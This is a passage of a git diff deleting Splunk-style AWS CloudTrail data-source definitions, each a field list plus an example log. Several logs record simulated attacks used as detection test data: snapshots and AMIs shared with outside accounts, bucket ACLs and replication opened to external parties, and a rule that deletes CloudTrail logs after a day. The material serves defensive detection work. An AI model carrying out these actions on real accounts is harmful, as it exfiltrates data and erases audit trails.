"dBInstanceStatus": "available", "masterUsername": "postgres", "endpoint": {"address": "database-1.ce6wk5bvtc0t.us-west-2.rds.amazonaws.com", "port": 5432, "hostedZoneId": "Z1PVIF0B656C1W"}, "allocatedStorage": 5, "instanceCreateTime": "Aug 5, 2022 9:02:51 AM", "preferredBackupWindow": "06:35-07:05", "backupRetentionPeriod": 7, "dBSecurityGroups": [], "vpcSecurityGroups": [{"vpcSecurityGroupId": "sg-46cfd020", "status": "active"}], "dBParameterGroups": [{"dBParameterGroupName": "default.postgres14", "parameterApplyStatus": "in-sync"}], "availabilityZone": "us-west-2a", "dBSubnetGroup": {"dBSubnetGroupName": "default", "dBSubnetGroupDescription": "default", "vpcId": "vpc-5f02343b", "subnetGroupStatus": "Complete", "subnets": [{"subnetIdentifier": "subnet-43225f35", "subnetAvailabilityZone": {"name": "us-west-2b"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-e55d7881", "subnetAvailabilityZone": {"name": "us-west-2a"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-0beddb972f034bdaa", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-2d70cd75", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}]}, "preferredMaintenanceWindow": "sat:11:44-sat:12:14", "pendingModifiedValues": {"masterUserPassword": "****"}, "latestRestorableTime": "Aug 5, 2022 9:12:31 AM", "multiAZ": false, "engineVersion": "14.2", "autoMinorVersionUpgrade": true, "readReplicaDBInstanceIdentifiers": [], "licenseModel": "postgresql-license", "storageThroughput": 0, "optionGroupMemberships": [{"optionGroupName": "default:postgres-14", "status": "in-sync"}], "publiclyAccessible": false, "storageType": "standard", "dbInstancePort": 0, "storageEncrypted": true, "kmsKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623", "dbiResourceId": "db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "cACertificateIdentifier": "rds-ca-2019", "domainMemberships": [], "copyTagsToSnapshot": true, "monitoringInterval": 60, "enhancedMonitoringResourceArn": "arn:aws:logs:us-west-2:111111111111:log-group:RDSOSMetrics:log-stream:db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "monitoringRoleArn": "arn:aws:iam::111111111111:role/rds-monitoring-role", "dBInstanceArn": "arn:aws:rds:us-west-2:111111111111:db:database-1", "iAMDatabaseAuthenticationEnabled": false, "performanceInsightsEnabled": true, "performanceInsightsKMSKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623", "performanceInsightsRetentionPeriod": 7, "deletionProtection": true, "associatedRoles": [], "httpEndpointEnabled": false, "tagList": [], "customerOwnedIpEnabled": false, "networkType": "IPV4", "backupTarget": "region"}, "requestID": "59e6b621-2f12-415b-bde4-21fa2dc7c113", "eventID": "46351ca1-760e-4eef-b3ff-19723e13fbf8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
deleted file mode 100644
index 30a54506b4..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: AWS CloudTrail ModifyImageAttribute
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.attributeType
-- requestParameters.imageId
-- requestParameters.launchPermission.add.items{}.userId
-- responseElements._return
-- responseElements.requestId
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:bonobo@bo.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bonobo@bo.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLBHIEEEPN", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-23T19:27:44Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-23T21:47:28Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifyImageAttribute", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.245.10", "userAgent": "AWS Internal", "requestParameters": {"imageId": "ami-06dac31db29508566", "launchPermission": {"add": {"items": [{"userId": "140429656527"}]}}, "attributeType": "launchPermission"}, "responseElements": {"requestId": "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "_return": true}, "requestID": "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "eventID": "957e1b12-ea17-4006-aefd-20677ace72b8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
deleted file mode 100644
index e9c77b5b6e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail ModifySnapshotAttribute
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.attributeType
-- requestParameters.createVolumePermission.add.items{}.userId
-- requestParameters.snapshotId
-- responseElements._return
-- responseElements.requestId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "bhavin_console"}, "eventTime": "2023-03-20T22:31:36Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifySnapshotAttribute", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1", "userAgent": "stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d", "requestParameters": {"snapshotId": "snap-02effb3bb62786b18", "createVolumePermission": {"add": {"items": [{"userId": "012345678912"}]}}, "attributeType": "CREATE_VOLUME_PERMISSION"}, "responseElements": {"requestId": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "_return": true}, "requestID": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "eventID": "62e027d3-7191-48f4-b5fe-4b66c58b3008", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
deleted file mode 100644
index a9bb8975ae..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
+++ /dev/null
@@ -1,90 +0,0 @@
-event_name: AWS CloudTrail PutBucketAcl
-fields:
-- _time
-- action
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.accessControlList.x-amz-grant-write-acp
-- requestParameters.acl
-- requestParameters.bucketName
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"}, "eventTime": "2021-01-12T14:03:17Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3api.put-bucket-acl]", "requestParameters": {"bucketName": "patricktestbucket19", "Host": "patricktestbucket19.s3.eu-central-1.amazonaws.com", "acl": "", "accessControlList": {"x-amz-grant-write-acp": "uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "qb+xR18y4+4serdq8conds+tNROklOFRYciGHof4z1pcnTnT9SCrx6iYHuupPNaiMnZ9kdB43yE=", "bytesTransferredOut": 0}, "requestID": "23FAB394417ECFCD", "eventID": "9feee3c9-711f-4f7d-af4c-992907a2a521", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucket19"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
deleted file mode 100644
index 33f63e49b6..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: AWS CloudTrail PutBucketLifecycle
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.LifecycleConfiguration.Rule.Expiration.Days
-- requestParameters.LifecycleConfiguration.Rule.Filter.Prefix
-- requestParameters.LifecycleConfiguration.Rule.ID
-- requestParameters.LifecycleConfiguration.Rule.Status
-- requestParameters.LifecycleConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.lifecycle
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-13T21:58:27Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketLifecycle", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57", "userAgent": "[stratus-red-team_d73089cf-1905-430c-b6d3-4dc4d669190f]", "requestParameters": {"lifecycle": "", "bucketName": "my-cloudtrail-bucket-alfsujjpnbpguqrh", "LifecycleConfiguration": {"xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled", "Filter": {"Prefix": "*"}, "Expiration": {"Days": 1}, "ID": "nuke-cloudtrail-logs-after-1-day"}}, "Host": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 249, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "TVXZE5kOVTMLqYlmKK+j/5g6flwkiFXFfw8PyNivFO4/9YXnDsyzFlGEzAy2rukTTiukLdEwtuM=", "bytesTransferredOut": 0}, "requestID": "1P8X27T2BCMY93Y9", "eventID": "25d92cd1-f366-4b11-b408-967a17ce70f3", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::my-cloudtrail-bucket-alfsujjpnbpguqrh"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
deleted file mode 100644
index 2f588d4e7d..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
+++ /dev/null
@@ -1,104 +0,0 @@
-event_name: AWS CloudTrail PutBucketReplication
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.ReplicationConfiguration.Role
-- requestParameters.ReplicationConfiguration.Rule.DeleteMarkerReplication.Status
-- requestParameters.ReplicationConfiguration.Rule.Destination.Bucket
-- requestParameters.ReplicationConfiguration.Rule.Filter
-- requestParameters.ReplicationConfiguration.Rule.ID
-- requestParameters.ReplicationConfiguration.Rule.Priority
-- requestParameters.ReplicationConfiguration.Rule.Status
-- requestParameters.ReplicationConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.replication
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-- vpcEndpointId
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4H11:bpatel@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bpatel@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLJOVYQHW2", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4H11", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-04-24T23:45:42Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-04-24T23:49:33Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketReplication", "awsRegion": "us-west-2", "sourceIPAddress": "23.93.193.6", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030 Linux/5.4.238-155.347.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.362-b10 java/1.8.0_362 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"replication": "", "bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "ReplicationConfiguration": {"Role": "arn:aws:iam::111111111111:role/attack_range_bpatel", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled", "Destination": {"Bucket": "arn:aws:s3:::badpublicbuckettest"}, "Filter": "", "Priority": 0, "ID": "replication_x_test", "DeleteMarkerReplication": {"Status": "Disabled"}}}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 416, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "8UoliFe/sG2/v8qB2g763/g0Fy+kfaUqtKrzLHEILnHUisC3rL1dQfJ3NSIYcA/kzpIHQ955pGo=", "bytesTransferredOut": 0}, "requestID": "14SAVMJNEJMTZN91", "eventID": "fbe079d1-bc6b-4ee0-8893-d2b412c5550f", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
deleted file mode 100644
index b6c0992a40..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: AWS CloudTrail PutBucketVersioning
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.VersioningConfiguration.Status
-- requestParameters.VersioningConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.versioning
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-- vpcEndpointId
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:daftpunk@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/daftpunk@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAQ5VXXXX", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-04T15:18:37Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-04T15:19:25Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketVersioning", "awsRegion": "us-west-2", "sourceIPAddress": "73.57.168.38", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030 Linux/5.4.196-119.356.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08 java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "versioning": "", "VersioningConfiguration": {"Status": "Suspended", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/"}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 125, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "F3tJSu/C2DMkRNLldcWTRzApxQa6v197ImcuQDA++vaeaLj9UvcIkEFgDIrMYUdXLI4t+Uih5hk=", "bytesTransferredOut": 0}, "requestID": "5KXZDSNDYXWC8Q4M", "eventID": "42d7a97e-9d35-4c8e-8d0a-4a82d91aab55", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
deleted file mode 100644
index e6ee58d2dc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail PutImage
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.imageManifest
-- requestParameters.imageManifestMediaType
-- requestParameters.imageTag
-- requestParameters.registryId
-- requestParameters.repositoryName
-- resources{}.ARN
-- resources{}.accountId
-- responseElements.image.imageId.imageDigest
-- responseElements.image.imageId.imageTag
-- responseElements.image.imageManifest
-- responseElements.image.imageManifestMediaType
-- responseElements.image.registryId
-- responseElements.image.repositoryName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.invokedBy
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AAAAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/test", "accountId": "111111111111", "accessKeyId": "AAAAAAAAAAAAAAAAAAAAA", "userName": "test", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-18T23:15:39Z", "mfaAuthenticated": "false"}}, "invokedBy": "AWS Internal"}, "eventTime": "2021-08-18T23:17:30Z", "eventSource": "ecr.amazonaws.com", "eventName": "PutImage", "awsRegion": "eu-central-1", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"registryId": "111111111112", "repositoryName": "devsecops/cat_dog_server", "imageManifest": "{\n   \"schemaVersion\": 2,\n   \"mediaType\": \"application/vnd.docker.distribution.manifest.v2+json\",\n   \"config\": {\n      \"mediaType\": \"application/vnd.docker.container.image.v1+json\",\n      \"size\": 6591,\n      \"digest\": 